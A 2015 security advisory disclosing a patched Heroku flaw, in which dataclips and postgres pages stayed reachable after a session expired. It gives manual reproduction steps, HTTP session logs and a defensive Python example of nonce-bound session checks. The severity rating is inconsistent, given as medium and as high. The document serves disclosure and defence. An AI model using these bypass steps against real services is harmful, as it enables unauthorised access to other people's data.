BugTraq
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability Jun 10 2015 11:59AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1323

Video: http://www.vulnerability-lab.com/get_content.php?id=1336

Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/06/09/heroku-bug-bounty-2015-api-re-auth-session-token-bypass-vulnerability

Release Date:
=============
2015-06-09

Vulnerability Laboratory ID (VL-ID):
====================================
1323

Common Vulnerability Scoring System:
====================================
6.1

Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform, a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: https://www.heroku.com/home )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered an application-side session validation vulnerability in the official Heroku API and web-application.

Vulnerability Disclosure Timeline:
==================================
2014-09-19: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-09-20: Vendor Notification (Heroku Security Team - Bug Bounty Program)
2015-03-11: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program)
2015-06-08: Vendor Fix/Patch Notification (Heroku Developer Team)
2015-06-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Heroku
Product: Heroku Dashboard - Web Application (API) 2014 Q3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
An application-side re-auth session bypass vulnerability has been discovered in the official Heroku API & web-application service.
The vulnerability allows an attacker to request unauthorized information without passing the second, forced re-authentication step.

The Heroku web-service provides all of its web services with a session-expiry function that disallows visiting a page without re-authentication.
The dataclips page session of the editor and the postgres service allows, for example, new content to be added. If the session expires in the main
Heroku web-service, the user is forced to log in again.

During the tests we found that the session of the dataclips service and editor remains available even while the re-authentication service is still running.
If the local attacker manually changes the path to request the stored content in the profile directly (as shown in the video), he is able to bypass the
security mechanism and add or request the database name.

The session validation mechanism needs to force a refresh of the postgres datasheet page and of the dataclips add-through-editor page to prevent unauthorized
access after a session has expired during use of the Heroku service.

The security risk of the re-auth session bypass vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 6.1.
Exploitation of the vulnerability requires a local low-privilege Heroku application user account without user interaction. Successful exploitation
of the vulnerability results in evasion and bypass of the re-authentication mechanism.

Proof of Concept (PoC):
=======================
The local re-auth bypass vulnerability can be exploited by local attackers with a low-privilege web-application user account or
by remote attackers without a privileged web-application account and with high user interaction. For a security demonstration, or to reproduce
the security vulnerability, follow the information and steps provided below.

Manual steps to reproduce the re-auth bypass vulnerability ...

1. Register a web account at the official Heroku website.
2. Provoke the re-auth function that pops up after several profile interactions once the session has expired.
3. When the session has expired, do not press the re-auth button of the popup, which is shown consistently across all services.
4. Switch back to the postgres.heroku service and add dataclips or your own databases, even though the session has expired for all other modules and sites.
Note: Even when all sessions have expired, the user is still able to request the databases and the dataclips in the service without authorization.
5. Successful reproduction of the session vulnerability!

Video Demonstration
The video demonstrates the vulnerability in the re-auth function of the Heroku service; it affects only the Heroku services for dataclips and databases.
The session-expired state also needs to be recognized by the database service and in the site validation request, to prevent access without re-auth to Heroku itself.

Exception Message:
-Your session has expired
--Your current session has expired or become inactive and has been terminated.
---Please log in again to continue using Dashboard.

--- PoC Session Logs ---
17:55:32.218[718ms][total 718ms] Status: 303[See Other]
GET https://id.heroku.com/logout Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure]
Location[https://id.heroku.com/login]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[17eefe38-a226-46fc-8e1d-2f673d87db10]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:55:32.937[159ms][total 818ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://www.heroku.com/home]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:55:42 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[6c5a1418-f70d-4eb5-901c-8b333e82d2e3]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:56:11.833[437ms][total 437ms] Status: 302[Found]
GET https://postgres.heroku.com/databases Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/login]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
x-request-id[3757ef00-dcc8-44e7-9413-c3d1beab8f0d]
x-runtime[0.008472]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:12.273[183ms][total 183ms] Status: 302[Found]
GET https://postgres.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[postgres.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Connection[close]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
status[302 Found]
Strict-Transport-Security[max-age=99; includeSubdomains]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1]
Location[https://postgres.heroku.com/auth/heroku]
Content-Type[text/html; charset=utf-8]
x-ua-compatible[IE=Edge,chrome=1]
Cache-Control[no-cache, private]
Set-Cookie[user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
super_user_session_secret=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure
postgres_session_nonce=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT; secure]
x-request-id[aab5515c-db99-4516-afb9-f81c6d7427e3]
x-runtime[0.005907]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:13.046[161ms][total 897ms] Status: 200[OK]
GET https://id.heroku.com/login Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[id.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/clips/new]
Connection[keep-alive]
Response Header:
Server[Cowboy]
Date[Sat, 20 Sep 2014 15:56:22 GMT]
Connection[keep-alive]
Strict-Transport-Security[max-age=31536000]
X-Frame-Options[SAMEORIGIN]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
Content-Type[text/html;charset=utf-8]
Set-Cookie[heroku_session=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure
heroku_session_nonce=; domain=.heroku.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000; secure]
Vary[Accept-Encoding]
Content-Encoding[gzip]
Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d]
Transfer-Encoding[chunked]
Via[1.1 vegur]

17:56:37.841[603ms][total 603ms] Status: 302[Found]
GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[dashboard.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Connection[keep-alive]
Response Header:
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:48 GMT]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
status[302 Found]
Strict-Transport-Security[max-age=31536000]
Location[https://dashboard.heroku.com/login]
Cache-Control[must-revalidate, no-cache, no-store, private]
Pragma[no-cache]
Expires[0]
X-Frame-Options[SAMEORIGIN]
x-ua-compatible[IE=Edge,chrome=1]
x-request-id[5e276c4f-1382-4328-ae95-b87a73376089]
x-runtime[0.006972]
x-rack-cache[miss]
Via[1.1 vegur]

17:56:39.215[207ms][total 207ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Connection[keep-alive]
If-None-Match["015d655373394c49a35217e89173847e"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:49 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["015d655373394c49a35217e89173847e"]
Cache-Control[max-age=0, private, must-revalidate]
x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359]
x-runtime[0.027082]
Via[1.1 vegur]

17:56:48.969[192ms][total 192ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Connection[keep-alive]
If-None-Match["809917d3d9ac788b43864dd9470788d6"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:59 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["809917d3d9ac788b43864dd9470788d6"]
Cache-Control[max-age=0, private, must-revalidate]
x-request-id[433e3190-bc29-4192-9a61-90754e41bb44]
x-runtime[0.029809]
Via[1.1 vegur]

Reference(s):
https://dataclips.heroku.com/
https://dataclips.heroku.com/clips/new
https://postgres.heroku.com/databases
-
https://dashboard.heroku.com/account
https://dashboard.heroku.com/login
https://id.heroku.com/logout

Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely verifying the dataclip and postgres service values that are processed when the login credentials are used.
The service needs to propagate expired sessions through all portals in the same or the next request, without allowing a separately requested section to be accessed with the expired session credentials.
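The session binding that the description and the fix above call for, shown as an added example that is not Heroku's code. It assumes, from the cookie names in the PoC logs, that the central login issues a domain-wide heroku_session_nonce cookie which /logout clears, and that a sub-service such as dataclips should tie its own session (called _session_id here) to that nonce; the session store, session ids and nonce values are constructed.

```python
import hmac

LOGIN_URL = "https://id.heroku.com/login"   # redirect target seen in the PoC logs
NONCE_COOKIE = "heroku_session_nonce"        # domain-wide cookie that /logout clears in the logs
SESSION_COOKIE = "_session_id"               # assumed name of the sub-service's own session cookie


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie request header into {name: value}. A cleared cookie
    (name with an empty value) is kept as '' so 'cleared' and 'absent' can be told apart."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def make_store(nonce: str) -> dict:
    """Constructed server-side session store: session id -> record. The record
    remembers the central nonce that was current when the user logged in."""
    return {"sid-alice-001": {"user": "alice", "bound_nonce": nonce}}


def authorize_local_only(store: dict, cookies: dict):
    """Weak check (the behaviour the advisory describes): the service trusts its
    own session cookie alone and never consults the central session state."""
    sess = store.get(cookies.get(SESSION_COOKIE, ""))
    if sess is None:
        return ("redirect", LOGIN_URL)
    return ("ok", sess["user"])


def authorize_nonce_bound(store: dict, cookies: dict):
    """Hardened check: the local session is valid only while the domain-wide nonce
    cookie is present and equals the nonce bound at login. A logout that clears the
    nonce, or a fresh login that rotates it, ends this service's session on the
    very next request, which is the 'same or next request' propagation the fix asks for."""
    sid = cookies.get(SESSION_COOKIE, "")
    sess = store.get(sid)
    if sess is None:
        return ("redirect", LOGIN_URL)
    current = cookies.get(NONCE_COOKIE, "")
    if not current or not hmac.compare_digest(current, sess["bound_nonce"]):
        store.pop(sid, None)   # server-side invalidation; a real response also clears the cookie
        return ("redirect", LOGIN_URL)
    return ("ok", sess["user"])


def run_scenarios() -> dict:
    """Replay the PoC sequence with constructed cookies and return what each check
    decides for a request to the sub-service in every state."""
    nonce = "constructed-nonce-0001"
    before_logout = parse_cookie_header(
        f"{SESSION_COOKIE}=sid-alice-001; {NONCE_COOKIE}={nonce}")
    # After GET /logout the central service sets heroku_session_nonce to '' with
    # max-age=0, so the browser stops sending it; the local cookie is untouched.
    after_logout = parse_cookie_header(f"{SESSION_COOKIE}=sid-alice-001")
    # After a fresh central login the nonce is rotated; a stale local session
    # must not survive that either.
    after_relogin = parse_cookie_header(
        f"{SESSION_COOKIE}=sid-alice-001; {NONCE_COOKIE}=constructed-nonce-0002")
    results = {}
    for label, cookies in (("before_logout", before_logout),
                           ("after_logout", after_logout),
                           ("after_relogin", after_relogin)):
        results[label] = {
            "local_only": authorize_local_only(make_store(nonce), cookies),
            "nonce_bound": authorize_nonce_bound(make_store(nonce), cookies),
        }
    return results


if __name__ == "__main__":
    for label, outcome in run_scenarios().items():
        print(label, outcome)
```

In the after_logout state the local-only check still answers ok for alice, which is the bypass the PoC logs show; the nonce-bound check redirects to the login page instead.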

Security Risk:
==============
The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information pages is estimated as high. (CVSS 6.1)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]
PGP KEY: http://www.vulnerability-lab.com/keys/admin (at) vulnerability-lab (dot) com [email concealed]%280x198E9928%29.txt
